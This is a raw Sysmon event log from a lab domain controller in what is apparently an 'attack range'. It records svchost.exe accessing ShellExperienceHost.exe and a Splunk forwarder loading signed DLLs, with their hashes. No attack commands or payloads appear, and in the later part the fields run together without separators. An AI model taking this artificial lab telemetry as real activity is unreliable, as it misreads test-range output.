  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98453 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A44B-6294-FD00-000000005502} | TargetProcessId: 580 | TargetImage: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98452 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A44B-6294-FD00-000000005502} | TargetProcessId: 580 | TargetImage: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98451 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A44B-6294-FD00-000000005502} | TargetProcessId: 580 | TargetImage: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98450 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A44B-6294-FD00-000000005502} | TargetProcessId: 580 | TargetImage: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98449 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A44B-6294-FD00-000000005502} | TargetProcessId: 580 | TargetImage: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 7 | Version 3 | Level 4 | Task 7 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98448 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.072
  ProcessGuid: {326FD73D-C07C-6294-2E0B-000000005502} | ProcessId: 5532 | Image: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
  ImageLoaded: C:\Windows\System32\cryptbase.dll | FileVersion: 10.0.14393.0 (rs1_release.160715-1616) | Description: Base cryptographic API DLL | Product: Microsoft® Windows® Operating System | Company: Microsoft Corporation | OriginalFileName: cryptbase.dll
  Hashes: MD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4 | Signed: true | Signature: Microsoft Windows | SignatureStatus: Valid

EventID 7 | Version 3 | Level 4 | Task 7 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98447 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.072
  ProcessGuid: {326FD73D-C07C-6294-2E0B-000000005502} | ProcessId: 5532 | Image: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
  ImageLoaded: C:\Windows\System32\rsaenh.dll | FileVersion: 10.0.14393.4467 (rs1_release.210604-1844) | Description: Microsoft Enhanced Cryptographic Provider | Product: Microsoft® Windows® Operating System | Company: Microsoft Corporation | OriginalFileName: rsaenh.dll
  Hashes: MD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686 | Signed: true | Signature: Microsoft Windows | SignatureStatus: Valid

EventID 7 | Version 3 | Level 4 | Task 7 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98446 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 
13:02:52.072{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000098445Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.072{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x800000000000000098444Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.072{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x800000000000000098443Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.072{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® 
Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x800000000000000098442Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.072{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x800000000000000098441Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.057{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000098440Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.057{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft 
Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000098439Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.057{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000098438Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.057{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000098437Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 
734700x800000000000000098436Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000098435Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000098434Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\winspool.drv10.0.14393.5125 (rs1_release.220429-1732)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=B2906606F5996AC73714F1910DB63626,SHA256=6BC9B694C275405A54CA8116C4D2BAD2ECA39B28B34B04358818059D743A572F,IMPHASH=396555AAEAB1402915E17EE8C257B7CFtrueMicrosoft WindowsValid 734700x800000000000000098433Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000098432Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000098431Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000098430Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 
734700x800000000000000098429Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000098428Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000098427Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000098426Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® 
Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000098425Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000098424Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000098423Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000098422Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000098421Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x800000000000000098420Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000098419Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft 
Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000098418Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000098417Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x800000000000000098416Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:52.041{326FD73D-C07C-6294-2E0B-000000005502}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 
